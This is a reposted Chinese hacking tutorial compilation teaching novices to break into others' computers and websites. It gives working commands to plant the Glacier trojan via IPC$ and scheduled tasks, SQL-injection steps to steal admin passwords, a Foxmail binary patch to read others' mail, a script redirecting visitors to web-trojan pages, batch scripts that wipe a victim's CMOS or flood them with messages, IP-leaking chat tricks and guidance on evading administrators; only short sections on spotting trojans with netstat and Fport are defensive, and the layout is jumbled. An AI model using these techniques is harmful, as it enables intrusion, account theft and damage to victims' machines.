神马文学网网络转载
来源:百度文库 编辑:神马文学网 时间:2024/05/01 17:40:32
黑客基本技巧
:听人说有经验的黑客仅仅通过一个ping
命令就可以判定远程主机的操作系统。这是怎么
回事?怎样实现?
:在ping主机后可以通过TTL返回值大体
判定。举例如下:
TTL=107(Windows NT)
TTL=108(Windows 2000)
TTL=127 或128(Windows 9x)
TTL=240或241(Linux)
TTL=252(Solaris)
新手入侵的几个问题
TTL=240(Irix)
大家可以在平时多总结一下,但也注意不要
过于迷信,因为一个聪明的管理员会手动修改TTL
值以迷惑入侵者。
:老是见到shell这个名词,这个shell是什
么?还有什么是exploit?
:shell代表的是用户和操作系统"交流”的
接口,就像Windows 2000中的cmd命令框。shell
的另一种解释是Unix系统下的一种脚本编程语言。
exploit一般解释为"溢出”或"漏洞”。我个人认
2
为解释成"溢出”更确切一些。
:用3389终端服务控制肉鸡好爽,可是对
方的管理员如果在主控台的话,会不会看到我对
他系统的控制?
:你的控制操作是在后台运行的,表面上
是察觉不到的。但是管理员可以通过
"Alt+Ctrl+Del”组合键查看到你的控制进程,然后
kill掉你的ID或者发个对话框过来吓你一跳,所以
最好是确定管理员不在线的时候再进行控制。
:我已拿到一台Windows 2000的admin权
限,但是只能通过telnet登录控制。我若想用终端
控制它该怎样做?
:Windows 2000自带一个无人职守的安装
工具:sysocmgr.exe。你可以telnet进入主机后再在
命令行下输入:
C:\>echo [Components] >c:\hackart
C:\>echo TSEnable = on >>c:\hackart
C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /
u:c:\hackart /q /r
过一会终端服务就会自动安装完毕。
"TSEnable=on”的意思是开启终端服务。最后一行
的/r参数是决定服务器是否重新启动。若去掉/r
参数将自动重启服务器。重新启动后终端服务也
会自动启动。详细参数设定请参考MSDN 帮助。
:我可以用Windows 98 入侵Windows
2000 或Windows NT 吗?
:当然可以!也可以入侵Unix/Linux,前提
是你要有跳板才行。因为Windows 98对网络的支
持较差,没跳板的话入侵起来很费力。
:像我这样的菜鸟怎样才能逐步提高自己
的入侵水平?
:多看看入侵教程,先从IIS系列入侵开
始,逐步向入侵Solaris、Linux、Free Bsd、Irix等进
化。不要急,慢慢来。
:我想知道入侵的详细步骤,因为有许多
时候我感到无从下手。
:入侵大体步骤如下:
1. 扫描目标主机( 找个好用的扫描器, 推荐
namp)。检查开放的端口,看哪个可以利用。搜集
目标服务器信息很重要,这可以保证"对症下药”
地进行后面的入侵工作。
2.看是否存在脆弱账号和密码,以及服务软件
漏洞,如Wu-FTP 漏洞等等。
3.若目标主机固若金汤,而你又有钱的话,可
以试试暴力破解。
4.如果对方只开放80 端口,你可以尝试探测
一下IIS或CGI漏洞等。
5.通过前面找到的漏洞进入对方主机,然后留
后门,清除日志等等。
:像我这样的初学者用什么扫描工具最好?
:流光、X-scan、SuperScan等等。
:我对SUN OS 入侵比较感兴趣,我想了
解一下sunrpc远程溢出漏洞及相对应的版本。
:rpc.ttdbserverd:Solaris 2.3,2.4,2.5,
2.5.1,2.6
rpc.cmsd:Solaris 2.5,2.5.1,2.6,7
sadmind:Solaris 2.6,7
snmpXdmid:Solaris 7,8
本地漏洞:lpset:Solaris 2.6,7
当你net start termservice失
败后可尝试用此方法。
提示
3
黑客基本技巧
作为一个初级黑客,我们首先要了解的是一
般的入侵步骤。一般入侵步骤分为三步:
1.扫描目标主机并分析扫描信息。比如:探测
开放的端口、获得服务软件及版本、探测漏洞等等。
2.利用扫描找到的漏洞,探测并获取系统帐号
或密码。
3.通过系统帐号或密码获得权限,然后对入侵
的主机进行操作。
下面从使用工具的角度讲解两个实际入侵的
例子。例子不涉及任何高深知识,但从中可以看出
入侵的一般步骤。
一、入侵单机-普通攻击
操作系统:Windows NT 系统。
工具:
1.shed.exe:shed.exe是一款用于网上查共享
资源的工具。它的查找速度快,可以查到很多服务
端的共享文件。不过其中有些ip在浏览器中无法访
问,这是因为它们也包含了个人上网的ip。
2.流光2000:一些网站和网吧的服务器目录
都是共享的,但是需要访问用户名和密码,否则会
出现访问不了或者权限不够的情况。这时候我们
可以用流光的ipc探测功能建立一个空对话,然后
再简单探测用户列表。如果遇到某些网管为了
方便把系统administrator账号设置得过于简单,便
可以抓到肉鸡了。
3.冰河8.4:在被入侵服务器端带宽很大的情
况下,使用冰河可以很快控制服务器,并且在几分
钟内就可以查到对方主机的主页所在位置。但是
如何上传并且控制它呢?这就要用到Windows 自
带的cmd.exe工具了。
4.cmd.exe:点击Windows桌面右下角"开始”
按钮,选择"运行”,在命令框里输入"cmd”后,
点击"确定”进入cmd.exe 的对话框。在cmd.exe
对话框中使用net命令,具体操作如下:
入侵的基本步骤介绍
第一步:输入"net use password
/user:username”
说明:以一个超级用户名与你想入侵的主机
建立联接,超级用户必须具有admin权限。这里的
"ip”输入要入侵主机的ip 地址,"username”与
"password”就是刚才用流光找到的超级用户的用
户名与密码。比如:"net use
juntuan/user:juntuan”。
第二步:输入"c o p y g - s e r v e r . e x e
”
说明:g-server.exe就是冰河的远程服务器端,
该命令将此文件拷贝到对方主机Window NT 系统
里的system32目录里。
第三步:"输入net time ”
说明:查看对方的服务器时间。之所以要查看
对方服务器时间,是因为不同机器上的系统时间
有差异,这里必须以对方的服务器时间为准。
第四步:at time g-server.exe
说明:这里的time就是对方的主机时间。该命
令的作用是在规定时间执行该程序。比如 a t
.*.*.* 19:55 g-server.exe,这样冰河就可
以在对方主机时间是19.55的时候控制该电脑了。
二、入侵网站—— SQL 注入攻击
工具:榕哥的SQL注入攻击工具包,在榕哥的
站点可以下载。这个工具包中有两个小程序:
"wed.exe”和"wis.exe”,其中"wis.exe”是用来
扫描某个站点中是否存在S Q L 注入漏洞的,而
"wed.exe”则是用来破解SQL注入用户名密码的。
两个工具的使用都非常简单,结合起来就可以完
成从寻找注入点到注入攻击成功的整个过程。
1.寻找SQL 注入点
"wis.exe”使用的格式如下:"wis.exe 网址”。
首先打开命令提示窗口,比如输入如下命令:
"wis.exehttp://www.xxx.com/”。在输入网址
4
时,前面的"http://”和最后面的"/”是必不可
少的,否则将会提示无法进行扫描。输入完毕后按
回车键,即可开始进行扫描了。从扫描结果中可以
看到,某些网站中存在着很多SQL注入漏洞。我们
可以随便挑其中一个,然后对它进行SQL注入,破
解出管理员的帐号。
2、SQL 注入破解管理员帐号
现在使用刚才下载的工具包中的"wed.exe”
程序,进入命令窗口中输入命令。命令格式为:
"wed.exe 网址”。需要注意的是,这次输入网址
时,最后面千万不要加上那个"/ ”,但前面的
"http://”还是必不可少的。输入后按回车键可以
看到程序运行的情况。可以看到程序自动打开了
工具包中的几个文件"C:\wed\wed\TableName.
dic”、"C:\wed\wed\UserField.dic”和"C:
\wed\wed\PassField.dic”,这几个文件分别用来破
解用户数据库中的字表名、用户名和用户密码所
需的字典文件。当然我们也可以用其它的工具来
生成字典文件,不过榕哥"黑客字典”已经足够强
大,不需要再去找其他工具了。
在破解过程中还可以看到"SQL Injection
Detected.”的字样,表示程序还会对需要注入破解
的网站进行一次检测,看看是否存在SQL 注入漏
洞,成功后才开始猜测用户名。
耐心等待一会后,就能获得数据库表名,然后
得到用户表名和字长,再检测到密码表名和字长,
最后用"wed.exe”程序进行用户名和密码的破解,
很快就得到了用户名和密码了。
3.搜索隐藏的管理登录页面
拿到了管理员的帐号后,还需要找到管理员
登录管理的入口才行。一般在网页上不会出现管
理员的入口链接,这时候还是可以使用"wis.exe”
程序。因为这个程序除了可以扫描出网站中存在
的所有SQL注入点外,还可以找到隐藏的管理员登
录页面。
管理员登录页面只可能隐藏在整个网站的某
个路径下。因此输入"wis.exehttp://www.xxx.
com/ /a”(http://www.xxx.com/ 为你要入侵
网站的网址),对整个网站进行扫描。依然要注意
扫描语句中网址的格式。按回车键后程序开始对
网站中的所有页面进行扫描,在扫描过程中找到
的隐藏登录页面会在屏幕上以红色显示出来。查
找完毕后,所有页面会以列表形式显示在命令窗
口中。
在浏览器中输入网址,出现了本来隐藏着的
管理员登录页面。输入用户名和密码,就进入到后
台管理系统了。
一、cmd 命令框下用IPC$ 登录肉鸡
的简单操作
用记事本建立一个名为login.bat文件,代码如下:
@net use %3 /u:"%2"
@echo
保存文件后,在cmd命令框里输入如下命令:
login.bat x.x.x.x user/password
其中"x.x.x.x”为肉鸡IP地址,"user”为肉
小黑客的九大贴身秘技
鸡admin 用户名,而"password”为密码。这样我
们以后每次用IPC$登录肉鸡就不用输入一大串的
命令了。
二、进入Foxmail 账户有妙招
在Foxmail中可以为账户加上访问密码,如果
想进入别人的信箱却不知道密码该怎么办呢?一
个众所周知的办法是:打开Foxmail文件夹下以账
5
黑客基本技巧
户名命名的任意一个文件夹,把里边一个名为
account.stg的文件复制到你想进入的账户目录里,
直接覆盖该目录下原来的account.stg文件。运行
Foxmail,就可以不需密码直接进入该信箱。但是
上面的方法并不隐蔽,因为对方下次使用信箱时
就会发现你破解了他的信箱。要想进入对方的信
箱而不被对方发现,可以使用下面这个办法:用16
进制文件编辑器UltraEdit打开Foxamil的主程序
Foxmail.exe文件,按组合键"Alt+F3”在查找框里
输入以下的代码"E8617EE4FF7515”,单击"确定”
开始后查找,找到后把其中的"7515”改为"9090”,
然后保存就可以了。再次运行Foxmail.exe后,就
可以随意进入设有密码的Foxmail邮箱了。该技巧
对5.0.500.0版本的Foxmail也有效。
三、利用vbs 脚本判断对方的IE 版本
做过网页木马的朋友都知道,针对不同版本
的IE,网页木马的制作方法也不相同,比方说针对
IE6.0版的网页木马制作方法与其它各个版本的就
不相同。因此我们在编制网页木马时,往往需要页
面具有自动判别对方IE版本的能力,以便根据对方
IE版本的不同,跳转到不同的网页木马页面。以下
一段vbs脚本可以帮助我们实现这个功能。
打开记事本,输入如下内容:
〈SCRIPT language=vbscript〉
if Instr(window.navigator.appversion,"MSIE 6.
0")>0 then
alert("浏览器:Internet Explorer 6.0")
window.location.href="http://IE6.0 网页木马
页面"
else
alert("浏览器:6.0版本以下")
window.location.href="http://IE6.0以下版网
页木马页面"
end if
〈/SCRIPT〉
这样,使用IE6.0的用户浏览了该页面后,会
自动跳转到"http://IE6.0网页木马页面”,不是
IE6.0的用户浏览后会自动跳转到"http://IE6.0以
下版网页木马页面”。当然,具体页面网址可根据
你设置的木马页面进行修改。
四、肉鸡ipc$ 打不开的解决办法
有些朋友反映通过telnet登录到对方的机器后
却不能打开ipc$,这该怎么办呢?可以按如下步骤
操作:
1.首先试试在cmd命令框里输入net share命
令,看ipc$服务能不能使用,如果不能使用,说明
对方没有安装文件和打印机共享服务,此时只能
放弃了。
2.如果ipc$服务可以使用,则输入net share
ipc$,看ipc$能不能打开。如果打不开就先输入net
stop server,然后输入net start server,这样就可
以知道ipc$能不能打开。
3.如果net stop server命令不能执行,则要先
关闭其附属进程,再关闭server的主进程,之后ipc$
多半可以连接上了。
4.如果ipc$还是连接不上,那么很可能是对方
开了防火墙,这时只能想办法杀掉防火墙的进程了。
五、用vbs 脚本结束进程
用记事本工具编写一个.vbs 文件,之后在
Windows2000下运行,就可以成功结束正在运行的
进程。
文件代码内容如下:
On Error Resume Next
strComputer="."Set objWMIService = GetObject
("winmgmts:" _
&& "{impersonationLevel=impersonate}!\\" &&
strComputer && "\root\cimv2")Set colProcessList
=objWMIService.ExecQuery _
("Select * from Win32_Process Where Name=*.
exe")For Each objProcess in colProcessList
objProcess.Terminate()Next
其中"*.exe”是你想要结束的进程,将它改
为你要结束进程的名即可。
6
六、利用批处理清除对方的CMOS 内容
如果你想清除对方电脑的CMOS 内容该怎么
办?方法有很多,其中利用批处理的方式是比较
另类的一招。具体办法是打开记事本,在文件中输
入如下内容:
Const ForAppending=8
Dim fso,x,y
Set fso=CreateObject("Scripting.
FileSystemObject")
Set x=fso.OpenTextFile("c:\autoexec.bat",
ForAppending, True)
Set y=fso.CreateTextFile("c:\1.txt", True)
x.WriteBlankLines(1)
x.Write"debug<1.txt"
x.WriteBlankLines(1)
y.WriteLine("o 70 10")
y.WriteBlankLines(1)
y.Write("o 71 10")
y.Close
x.Close
把上述内容保存为.bat文件,然后拷贝到对方
的电脑上运行即可。它的作用是向Autoexec.bat中
加入数据,创建一个文件,并向其中写入内容,使
对方机器在下次开机时调用debug清除掉CMOS设
置,包括CMOS 密码。其实,这与大家常用的清除
CMOS 密码的方法很相似,通常情况下清除CMOS
密码的方法是在cmd命令框下输入"debug”,按回
车键之后输入如下命令即可手工清除密码:
-o 70 10
-o 71 01
- q
七、利用批处理轰炸对方电脑
打开记事本,在里面输入如下内容:
@echo 正在轰炸中..
:start
@net send %1 %2
@if errorlevel 1 goto over
goto start
:over
@echo 发送失败:(
将其保存为文件名为"xxx.bat”的批处理文
件即可(xxx 可为任意文件名)。
之后在cmd 命令框里输入以下命令:
xxx.bat x.x.x.x message
其中"x.x.x.x”为要轰炸的IP地址,"message”
为轰炸时发送给对方的消息。
八、戏弄非法用户
为防止有人胡乱使用自己的电脑,我们可以
利用批处理文件来戏弄一下非法用户。用记事本
程序在Windows目录中建立一个Winstart.bat文件,
并在该文件中加入以下命令:
@echo off
echo non-system disk or disk error
choice/c:&&/n
上面代码中的"&&”为我们设置的密码,你
可以自行设置。这样重新启动计算机开机时显示
器上会显示"non-system disk or disk error”,而且
光标一直闪烁,给非法用户造成是Windows 死机
的假象。有时就连高手也会上当受骗。当我们要进
入系统时,只要输入"&&”即可。
九.我的电脑你别用
如果你不想让别人使用你的电脑,又不好意
思说,那该怎么办呢?也许你认为可以在CMOS中
设密码。但是如果是朋友向你询问密码,你好意思
不说吗?其实,我们可以用下面这个办法来欺骗
一下他的眼睛,使他以为电脑坏了,从而放弃使用
你电脑的念头。
方法是:进入cmd窗口,在里面输入:copy con
null.sys,之后按两次回车键,然后按"Ctrl+Z”组
合键或F6键,屏幕上会显示^z,再次按回车键,屏
幕上会显示"1 file(s) copied”,这样一个名为null.
sys 的空文件就建好了。现在,找到C盘根目录下
的config.sys文件(注意这个文件是隐藏属性,所
7
黑客基本技巧
当前最为常见的木马通常是基于TCP/UDP 协
议进行client端与server端之间的通讯的。既然要用
到这两个协议,就不可避免要在server端(就是被
种了木马的机器)打开监听端口来等待连接。例如
鼎鼎大名的冰河使用的监听端口是7626,Back
Orifice 2000则是使用54320等等。我们也可以通
过查看本机开放端口的方法来检查自己是否被种
了木马或其它hacker程序。以下是详细的介绍。
一、Windows本身自带的netstat命令
关于netstat命令,我们先来看看Windows帮助
文件中的介绍:
Netstat
显示协议统计和当前的TCP/IP 网络连接。该
命令只有在安装了TCP/IP 协议后才可以使用。
netstat [-a] [-e] [-n] [-s] [-p protocol] [-r]
[interval]
参数
-a
显示所有连接和侦听端口。服务器连接通常
不显示。
-e
显示以太网统计。该参数可以与-s 选项结
合使用。
-n
以数字格式显示地址和端口号(而不是尝试
查找名称)。
-s
查看自己开放的端口
显示每个协议的统计。默认情况下,显示TCP、
UDP、ICMP 和IP 的统计。
-p 选项可以用来指定默认的子集。
-p protocol
显示由protocol指定的协议的连接。protocol可
以是tcp或udp。如果与-s选项一同使用显示每个
协议的统计,protocol可以是TCP、UDP、ICMP或IP。
-r
显示路由表的内容。
interval
重新显示所选的统计,在每次显示之间暂停interval
秒。按"Ctrl+B”组合键停止重新显示统计。如
果省略该参数,netstat将打印一次当前的配置信息。
看完这些帮助文件,我们应该明白netstat命令
的使用方法了。现在就让我们现学现用,用这个命
令看一下自己的机器开放的端口。进入到命令行
下,使用netstat命令的a和n两个参数:
C:\>netstat -an
Active Connections
Active Connections是指当前本机活动连接,
Proto是指连接使用的协议名称,Local Address是
以必须设置"文件夹选项→查看”中属性为"显示
所有文件和文件夹”才可以看到),然后右键单击
该文件,在弹出菜单中选择"用记事本打开”,接
下来在config.sys文件中加入一行:
device=c:\null.sys /d:null
保存修改结果,退出记事本。以后,你的电脑
就会在出现Windows的启动画面时自动重新启动,
如此反复下去,别人一定以为你的电脑出了问题,
而你就可以偷偷乐了。
Proto Local Address ForeignAddress State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 0.0.0.0:0
UDP 0.0.0.0:1046 0.0.0.0:0
UDP 0.0.0.0:1047 0.0.0.0:0
8
本地计算机的IP 地址和连接正在使用的端口号,
Foreign Address是连接该端口的远程计算机的IP
地址和端口号,State则是表明TCP 连接的状态,你
可以看到后面三行的监听端口是UDP协议的,所以
没有State 表示的状态。从上面可以看到机器的
7626 端口已经开放,正在监听等待连接,这表示
机器很可能已经感染了冰河。
二、工作在Windows 2000 下的Fport
Fport是FoundStone出品的网络安全工具。它可
以用来列出系统中所有打开的TCP/IP和UDP端口,
以及对应的应用程序的完整路径、PID标识、进程名
称等信息。该软件在cmd命令框下使用,请看例子:
D:\>fport.exe
FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com ;
这样各个端口究竟是什么程序打开的就一目
了然了。如果发现有某个可疑程序打开了某个可
疑端口,那就很可能是木马。
Fport 的最新版本是2.0。很多网站都提供下
载,但是为了安全起见,最好还是到FoundStone的
官方网站去下载。(http://www.foundstone.com/
knowledge/zips/fport.zip)
三、与Fport 功能类似的形化界面
工具Active Ports
Active Ports为SmartLine出品的用来监视电脑
所有打开的TCP/IP/UDP端口的工具。它不但可以
将你所有的端口显示出来,还显示所有端口所对
应的程序所在的路径,本地IP和远端IP(试连接
你的电脑IP)是否正在活动。除此之外,它还提供
了一个关闭端口的功能,当你用它发现被木马开
放的端口时,可以立即将端口关闭。这个软件在
Windows NT/2000/XP 平台下工作,你可以从
http://www.smartline.ru/software/aports.zip下载。
其实使用Windows XP的用户无须借助其它软
件即可以得到端口与进程的对应关系,因为Windows
XP所带的netstat命令比以前的版本多了一个
"o”参数,使用这个参数就可以检测到与打开端口
对应的进程。
上面介绍了几种查看本机开放端口以及与端
口相对应的进程的方法,通过这些方法可以轻松
地发现基于TCP/UDP 协议的木马。但是如果碰上
反弹端口木马,或者利用驱动程序及动态链接库
技术制作的新木马时,以上这些方法就很难查出
木马的痕迹了。所以我们一定要养成良好的上网
习惯,不要随意运行邮件中的附件,从网上下载的
软件先用杀毒软件检查一遍再使用,在上网时要
打开网络防火墙和病毒实时监控,以保护自己的
机器不被木马或病毒入侵。
作为一个黑客,在攻击前收集对方机器信息
是很重要的。因此如何得到对方主机的IP地址是一
个重要问题,下面就介绍几种简单的查看目标机IP
地址的方法。
一、通过QQ 软件查IP 补丁查IP
每当QQ 的一种新版本出来,隔不了几天补丁
程序就出来了,即便是菜鸟查看IP地址和端口都异
常容易,如QQ2005 珊瑚虫版就在腾讯公司提供
轻松查看IP 地址
Pid Process Port Proto Path
748 tcpsvcs 7 TCP C:\WINNT\System32\tcpsvcs.exe
748 tcpsvcs 9 TCP C:\WINNT\System32 \tcpsvcs.exe
748 tcpsvcs 19 TCP C:\WINNT\System32 \tcpsvcs.exe
416 svchost 135 TCP C:\WINNT\system32 \svchost.exe
9
黑客基本技巧
1
2
3
QQ2005 下载之后很短时间内就出来了,这种版本
便是在QQ原有版本的基础上,增加了显示好友的
IP 地址以及地理位置的补丁,只要对方在线就可
以轻松查看对方的IP地址、所在地等信息(1)。
二、用防火墙查看IP
由于QQ 使用的是UDP 协议来传送信息的,而
UDP 是面向无连接的协议,为了保证信息到达对
方,QQ 需要对方发一个认证,告诉本机对方已经
收到消息,一般的防火墙(例如天网)都带有UDP
监听的功能,因此我们就可以利用这个功能来查
看IP。
第一步:运行防火墙程序,在"自定义IP规则”
那一栏把"UDP 数据包监视”选项打上钩(QQ 中
的聊天功能使用的是UDP的4000端口作为数据发
送和接收端口)。接着点一下工具按钮上那个像磁
盘一样的"保存规则”标(2)。
第二步:运行QQ,向想查询IP 地址的QQ 对
象发一信息。
第三步:切换到防火墙程序所在窗口,点击主
界面像铅笔一样的按钮进入日志界面,看看当前
由防火墙记录下来的日志(3)。
在日志中,如果对方端口是OICQ Server[8000],
则表示该条日志上的IP地址是QQ服务器的。排除
了本机的IP地址、发送到网关的IP地址以及QQ服
务器的IP地址后,剩下的就是对方的IP地址了,如
中为210.82.117.92。拥有了对方的IP地址,如
果还想知道对方的地理位置,可以再配合"追捕”
之类的工具软件,便可了解对方大概在哪里了。用
这种方法来查找IP 地址,不会受QQ 版本的限制,
是一劳永逸的事。
注意:利用天网的日志功能也可以查到那些
成天抱着一个扫描器到处扫描的人的IP地址。这
是黑客需要具备的很重要的技能,在攻击别人时,
首先要懂得保护自己,时时警惕身边可能存在的
黑客,以免弄得"出师未捷身先死”,那就得不偿
失了。
三、聊天室中查IP
在允许贴、放音乐的聊天室,利用HTML 语
10
4
5
如果对方在浏览器中将像、声
音全部禁止了,此方法就无能为力。
对于使用代理服务器的,此方法也只
能查到他所用代理的IP地址,无法查
到其真实IP地址。
提示
对于个人计算机或是其它机器我
们还可以使用ping 命令查看对方是
否在线,只有对方在线,我们才能再
进行下一步攻击。
提示
言向对方发送片和音乐,如果把片或音乐文
件的路径设定到自己的IP上来,那么尽管这个URL
地址上的片或音乐文件并不存在,但你只要向
对方发送过去,对方的浏览器将自动来访问你的
IP。对于不同的聊天室可能会使用不同的格式,但
你只需将路径设定到你的IP上就行了。
如:"XXX 聊天室”发送格式如下:
发像:img src="http:// 61.128.187.67/
love.jpg"
发音乐:img bgsound="http:// 61.128.187.
67/love.mid"
这两个语句里的61.128.187.67需要替换成你
自己的IP地址。这样你用监视软件就可以看到连接
到你机器的IP地址,这种软件很多,如lockdown,
IP Hunter等。
四、查网站的IP 地址
如果想要攻击某个网站的话,也需要首先获
得该网站的IP地址,获取网站地址最简单的办法还
是使用Windows自带的一个小程序ping.exe。
在cmd 命令框下输入"pingwww.xxx.com”。
运行之后会显示该网站的IP地址以及其他一些信
息(4)。
如果ping通了,将会从该IP地址返回byte,time
和TTL的值,这样我们就有了进一步进攻的条件。
其中time时间越短,表示响应时间越快。
随着QQ 版本的升级,QQ 安全性
也越来越高,用户可以自己设定是通
过点对点模式还是服务器模式传送消
息,如果对方选择了服务器模式,你
也就得不到他的IP地址了。
提示
11
黑客基本技巧
随着网络黑客工具的简单化和傻瓜化,越来
越多的黑客爱好者可以通过现成的攻击工具轻松
地入侵主机。然而谁也不想在管理员的眼皮底下
入侵电脑,因此在入侵成功之后,一个很重要的事
情是:你能不能确认你的行为是在别人的监视之
下?所以我们首先要知道管理员是不是现在正在
你侵入的主机上。
一、要判定管理员是否在线,首先就要知道管
理员是通过什么方式管理主机的:是pcanywhere、
vnc、DameWar、终端服务、ipc、telnet还是本地登录。
如果是用第三方的控屏工具(pcanywhere、vnc、
DameWar 等),你只要看相应端口有没有状态为
"ESTABLISHED" 的连接。在cmd 命令框里输入
"netstat -an”命令就可以知道。如果想查看与端
口相关的进程,使用"Fport.exe”就可以了。比如
我们在一台主机上使用"netstat -an”发现如下的
信息:
Active Connections
然后使用Fport.exe得到如下的信息:
如何判断管理员是否在线
在Windows 2000 下打开cmd 窗口,然后输入
如下命令:
for /l %a in (1,1,254) do start /min /low
telnet 192.168.0.%a 3389
这条命令可以使192.168.0.x这个IP段所有开
放3389端口的主机都会暴露出来。这条命令执行
后会在任务栏打开254个小窗口,每个窗口对应一
个该IP段的IP地址。如果检测到某IP地址的主机
未开放3389 端口,则对应的窗口将在5 秒钟内退
出,最后剩下的窗口对应的就是开放了端口的主
机了,看一下小窗口的标题可以得知主机的IP地
址。如果你觉得你的机器性能很好的话,还可以
把/low 参数去掉。
如果要扫描一台主机的多个端口,可以输入
如下命令:
for /l %a in (1,1,65535) do start /low /min
telnet 192.168.0.1 %a
这样就扫描到IP地址为192.168.0.1的主机从
1 到65535的所有端口。
输入如下命令扫描一个网段的所有端口:
for /l %a in (1,1,254) do for /l %b in (1,
1,65535) do start /low /min telnet 192.168.0.
%a %b
这样就可以扫描IP段为192.168.0.x的全部主
机从1 到65535的所有端口。
以上命令在Windows 2000 以及Windows XP
下测试可以使用。
扫描一个网段的所有端口
Proto Local Address ForeignAddress State
TCP lin:1755 lin:telnet ESTABLISHED
TCP lin:1756 lin:netbios-ssn ESTABLISHED
TCP lin:1758 202.103.243.105:http TIME_WAIT
TCP lin:1764 202.103.243.105:http TIME_WAIT
TCP lin:6129 lin:1751 ESTABLISHED
Pid Process Port Proto Path
528 mysqld-nt 3306 TCP D:\mysql\bin\mysqld-nt.exe
1328 DWRCS 6129 TCP C:\WINNT\SYSTEM32\DWRCS.EXE
8 System 138 UDP
248 lsass 500 UDP C:\WINNT\system32\lsass.exe
12
其中"1328 DWRCS → 6129 TCP C:
\WINNT\SYSTEM32\DWRCS.EXE”这行代表的是
DameWare Mini Remote Control服务。从这个可以
看出,管理员是通过DameWare Mini Remote Control
来管理现在的主机,连接的端口是6129。同样,
如果管理员使用其他的控屏工具, 比如
pcanywhere、vnc等,我们也可以通过"netstat -an”
查看端口连接的情况。
二、对于从本地或终端服务登录的,由此可以
通过查看winlogon进程进行判断。我们可以使用的
工具是psttools系列工具中的pulist.exe,它能够查
看本机所有正在运行的进程。当然仅凭几个
winlogon进程也很难完全判定在线的是不是管理员,
因为一般用户和管理员都是通过形界面登录的,
身份验证都是在GINA(Graphical Identification and
Authentication,形标识和身份验证)中进行,而
GINA又和winlogon进程紧密相关,所以查看有几个
winlogon进程只能知道当前有几个用户登录主机。
在主机上运行pulist.exe,查看进程情况如下:
上面我们发现有"2 0 8 \ ? ? \ C : \ W I N N T
\system32\winlogon.exe”和"1084 \??\C:
\WINNT\system32\winlogon.exe”这二个
winlogon.exe进程,由此可以知道目前有两个用户
通过本地或终端服务登录主机。再结合上面说的
判定方法,使用"netstat - an”命令查看TCP端
口连接:
由此可以看出管理员使用的是终端3389连接
登录。
三、因为telnet的登录不是通过winlogon来管
理的,所以要判断通过telnet登录的管理员是否在
线还是看相应端口的连接吧。我们知道一般情况
下telnet使用23端口连接,通过"netstat -an”命
令可以很清楚地看出23端口有没有打开:
C:\>netstat -an
Active Connections
我们也可以通过上面的方法查看相应的进程,
比如使用FPORT.EXE 得到如下的信息:
E:\HACK>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
从上面信息中"1112 tlntsvr 23 TCP C:\WINNT
\system32\tlntsvr.exe”这行可以知道23端口对应
的正是telnet服务tlntsvr.exe。
四、如果管理员是通过IPC$ 管道进行登录管
理,我们可以用Windows NT 系统内置的工具NET
SESSION 来判断其是否在线。NET SESSION的作用
是列出或断开连接本地计算机和与它连接的客户
之间的会话。使用后结果如下:
PID Path
0 [IdleProcess]
8 [System]
160 \SystemRoot\System32\smss.exe
184 \??\C:\WINNT\system32\csrss.exe
208 \??\C:\WINNT\system32\winlogon.exe
680 C:\WINNT\System32\svchost.exe
404 C:\WINNT\Explorer.EXE
1088 \??\C:\WINNT\system32\csrss.exe
1084 \??\C:\WINNT\system32\winlogon.exe
Num LocalIP Port RemoteIP PORT Status
10 192.168.0.1 3389 192.168.2.1 1071 Established
Proto Local Address Foreign Address State
TCP 127.0.0.1:23 127.0.0.1:1030 ESTABLISHED
TCP 127.0.0.1:1030 127.0.0.1:23 ESTABLISHED
Pid Process Port Proto Path
660 inetinfo 21 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1112 tlntsvr 23 TCP C:\WINNT\system32\tlntsvr.exe
660 inetinfo 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
416 svchost 135 TCP C:\WINNT\system32\svchost.exe
660 inetinfo 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
8 System 1028 TCP
408 telnet 1030 TCP C:\WINNT\system32\telnet.exe
13
黑客基本技巧
E:\HACK>net session
命令成功完成。从上面我们可以看出当前有
一个用户名为LIYUN的用户登录了主机LIN。
下面再给大家推荐一个比较好的工具——
PSTOOLS工具系列里面的psloggedon.exe,它不仅
能列出使用IPC$登录的用户,而且能列出本地登
录的用户。运行效果如下:
E:\Pstools\Pstools>psloggedon.exe
PsLoggedOn v1.21 - Logon Session Displayer
Copyright (C) 1做广告请找站长商谈-2000 Mark Russinovich
Users logged on locally:
肉鸡是指打开了3 3 8 9 端口微软终端服务
(microsoft terminal service),又存在弱密码的高速
服务器的俗称。我们要用肉鸡做跳板,是出于安全
考虑,因为这样可以更好地隐藏自己的踪迹。我们
可以用各种远程管理工具登录上肉鸡,然后像操
作自己电脑上一样控制远程的服务器(也就是肉
鸡)做我们想做的事情。
基本的工具:
1. X-scan v1.3
强大的漏洞扫描工具,对于初学者来说是非
常好的一个工具。我们主要用它来扫描一些基本
的漏洞(主要是Windows NT 中的弱密码)。
2. Superscan
非常快速的端口扫描工具,可以在很短的时间
里发现某个IP域上IP的分布。使用它的原因主要是
为了避免盲目扫描,以便提高扫描效率。比如说,
某个IP域上IP地址的分布不是连续的,有可能从
xxx.xxx.0.0-xxx.xxx.50.255每个IP地址上都有计
算机存在,而从xxx.xxx.51.0- xxx.xxx.100.255
每个IP都没有计算机存在。如果你不通过Superscan
扫描事先了解这个情况的话,就会白白花很长时间
去扫描根本不存在的主机,浪费金钱和精力。
3. fluxay
大名鼎鼎的扫描工具,我们主要用它的NT 管
道命令功能来实现连接目标主机、添加用户以及
启动远程服务等功能。
注意:最好使用4.0版本fluxay。
4. 基于Windows2000或更高版本的cmd提示
符工具
也就是说,跳板的制作至少是要在Windows
2000以上的操作系统下进行。
5. sksockserver.exe
做跳板的主角,我们就是用它来实现远程主
机的Socks5代理功能。
肉鸡DIY 全攻略
2004-*-* 14:33:38 LIN\Administrator --
---这个是本地登录的用户administrator
Users logged on via resource shares:
2004-*-* 14:41:04 LIN\LINYUN ----
-这个是使用IPC$连接的用户LINYUN
当然,如何判定管理员是否在线是一个比较
深入的话题,上面说的仅仅是提供一个思路。如果
